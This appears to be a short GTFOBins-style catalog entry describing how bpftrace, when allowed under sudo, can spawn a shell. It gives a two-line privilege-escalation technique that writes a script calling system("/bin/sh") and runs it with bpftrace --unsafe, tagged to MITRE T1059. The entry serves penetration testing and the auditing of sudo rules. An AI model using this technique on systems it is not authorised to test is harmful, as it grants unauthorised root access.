Catalog GTFOBins

GTFO · Tool

bpftrace

3 techniques LinuxGTFOBins GPL-3.0

shell

ExecutionPrivilege Escalation Linux
echo 'BEGIN {system("/bin/sh 1<&0");exit()}' >/path/to/temp-file
bpftrace --unsafe /path/to/temp-file
Context
sudo
Native
shell
MITRE
T1059